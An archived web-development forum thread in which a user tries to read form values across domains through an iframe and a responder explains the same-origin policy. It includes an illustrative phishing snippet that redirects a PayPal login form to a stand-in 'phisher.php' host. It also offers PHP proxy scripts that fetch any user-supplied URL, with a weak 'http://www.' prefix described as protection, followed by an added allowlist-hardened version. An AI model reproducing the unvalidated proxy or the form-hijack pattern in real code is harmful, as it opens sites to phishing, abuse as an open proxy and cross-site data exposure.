Re-write document.location

Hi,

I'm developing an app on one domain and want to read certain variables in to another domain.

Is it possible using an iframe?

I keep getting security errors and I've tracked it down to the "document.location." in the JS.

Does anyone know if it's possible to re-write or side-step this?

thanks
May 27 '07 #1
pbmods
5,821 Expert 4TB
Heya, designassassin. Welcome to TSDN!

> I'm developing an app on one domain and want to read certain variables in to another domain.

I'm not sure I understand what you're trying to accomplish.

Are you trying to define JavaScript variables in an iframe that you want to be accessible to the parent page?

Or do you need to access server-side variables from the client side?
May 28 '07 #2
Thanks,

I have an online app that for various reasons I had to build on a Windows server. Anyway, when this page is run in a browser it generates some variables that populate a form. Stuff like 'page load time' etc...

On a second domain I have another, more basic app (on a Unix server) that runs some PHP commands to compile the data. I was hoping that, through an iframe, I could load app 1 variables into app 2's page. But it doesn't work! :(

I'm sure my code is sound - it's just as soon as I try to read the vars across domains it packs up... I get a security error.

is v frustrating because I'm at the final hurdle with this one.
May 28 '07 #3
pbmods
> when this page is run in a browser it generates some variables that populate a form. stuff like 'page load time' etc...
>
> on a second domain i have another, more basic app (on a unix server) that runs some php commands to compile the data. i was hoping that, through an iframe i could load app 1 variables into app 2's page. but it doesn't work!

So you're trying to pass variables from page 1 to page 2... via what? AJAX? Using a form? Loading a new URL with GET variables?

> I'm sure my code is sound - it's just as soon as i try to read the vars across domains it packs-up... i get a security error.

You will get a security error on most browsers if you try to fetch a page from a different domain using AJAX. This is to prevent XSS.

The solution is to create a page on your server that uses file_get_contents to load the page from the other domain and then call that script with your AJAX call instead.
May 28 '07 #4
Thanks for your input.

I'm just using a bit of javascript:

[HTML]onClick="document.myform2.mysession.value=window.frames['ifrm'].document.forms['frm_product'].elements['sessiontime'].value">[/HTML]

Alternatively, as the final information is for my eyes only, I wondered if there was an old version of a browser that you could recommend that wouldn't give me security errors. This is not ideal but I think I could get by like this.
May 28 '07 #5
pbmods
> [HTML]onClick="document.myform2.mysession.value=window.frames['ifrm'].document.forms['frm_product'].elements['sessiontime'].value">[/HTML]

I think I understand why you are getting security errors with this statement.

Suppose you created a website that looked something like this:

```html
<html>
<iframe id="thePfhrame" src="http://www.paypal.com/login"></iframe>
<script type="text/javascript">
// The same-origin policy blocks this: a page cannot reach into a frame loaded from another domain.
document.getElementById('thePfhrame').contentDocument.forms[0].action = 'http://mysneakysite.com/phisher.php';
</script>
</html>
```
Assuming that the first form on paypal.com/login is the login form, you can see how somebody might set up a pretty convincing phishing page. Even if you right-click on the [frame] and select "show source", you'll see the source for the original PayPal login page.

In order to be able to modify the contents of your iframe, you'd have to set it up so that it loads a page from the same domain as its parent.

My recommendation would be to load the target page on the server side and output it, like this:

```html
<iframe src="http://mysite.com/redirect.php?url=www.somesite.com%2Fpath%2Fto%2Fthe%2Fpage.ext"></iframe>
```
redirect.php:
```php
<?php
readfile($_GET['url']); // echoes whatever the url parameter names, unvalidated
```
[EDIT: Of course, you could then abuse this in the example above by changing the form's source to http://mysite.com/redirect.php?url=www.paypal.com%2Flogin. But smart Users will check their location bar anyway.]
May 28 '07 #6
mmm.. interesting.

Am I right in thinking that I'd need to upload a PHP file on the target server (i.e. the one in the iframe)?

if so, i'd like to try and avoid doing this if possible.

here're the 2 domains i'm working with...

my admin page (domain 1)
http://formworks.org/gb_mod

my app page (domain 2)
http://www.takeawayplace.com/gb/index2.html

...the thinking is you type some text into the box and click 'receive data' - this is basically what i want to be able to do.

my example uses a flash form - but it can easily be an html form.

please let me know if you can think of a way to do it so i don't have to upload another file to domain 2.

thanks again.
May 29 '07 #7
I'm still stuck on this one. :(

I'm thinking that there's a way to get a variable using php POST or GET

am i on the right track?

tnx
May 29 '07 #8
pbmods
> my admin page (domain 1)
> http://formworks.org/gb_mod
>
> my app page (domain 2)
> http://www.takeawayplace.com/gb/index2.html

Try something like this:
```javascript
function doSomething() {
    document.getElementById('theEyePfhrame').src = 'http://formworks.org/loadExternal.php?url=' + encodeURIComponent('takeawayplace.com/gb/index2.html');
}
```
Note that we leave off the 'http://www' from the target URL. This is important.

Then create loadExternal.php:
```php
<?php
readfile("http://www.$_GET[url]");
```
We put the 'http://www.' here so that a User couldn't modify the JavaScript and try to fetch '/etc/passwd' for example, or '/var/www/mysqlpassword.php', or.... Instead, we force the script to attempt to load a website.

Anyway, so there you have a script that accesses a page on the same domain, which loads the page from the other domain and directly echoes the output.

Once that page loads, since the domain is the same as the parent page, you should be able to access JavaScript variables from that page.
May 29 '07 #9
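
Added example, not part of the original thread: one way to keep the loadExternal.php proxy from post #9 from fetching arbitrary sites is to parse the final URL and accept only allowlisted hosts. The ALLOWED_HOSTS list and the resolve_target() helper are assumptions introduced for illustration. The fetched page is still echoed under the proxy's own domain, so only a site you control belongs on the list.

```php
<?php
// Hardened loadExternal.php (added example; the allowlist below is an assumption).
const ALLOWED_HOSTS = ['www.takeawayplace.com'];

// Return the upstream URL for a user-supplied value, or null if it must be refused.
function resolve_target(string $raw): ?string
{
    // Whitespace and control characters have no place in a URL fragment.
    if ($raw === '' || preg_match('/[\x00-\x20\x7f]/', $raw)) {
        return null;
    }
    // Same construction as the thread's script: the caller omits "http://www."
    $parts = parse_url('http://www.' . $raw);
    if ($parts === false || !isset($parts['host'])) {
        return null;
    }
    // Reject embedded credentials and explicit ports; neither is needed here.
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return null;
    }
    $host = strtolower($parts['host']);
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        return null;
    }
    // Rebuild from the parsed pieces so only validated components are requested.
    $query = isset($parts['query']) ? '?' . $parts['query'] : '';
    return 'http://' . $host . ($parts['path'] ?? '/') . $query;
}

$raw = $_GET['url'] ?? '';
$target = is_string($raw) ? resolve_target($raw) : null;
if ($target === null) {
    http_response_code(400);
    exit('Target not allowed');
}

// Do not follow redirects: a 3xx response could point away from the allowlisted host.
$ctx = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
$body = @file_get_contents($target, false, $ctx);
if ($body === false) {
    http_response_code(502);
    exit('Upstream fetch failed');
}
header('Content-Type: text/html; charset=utf-8');
echo $body;
```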
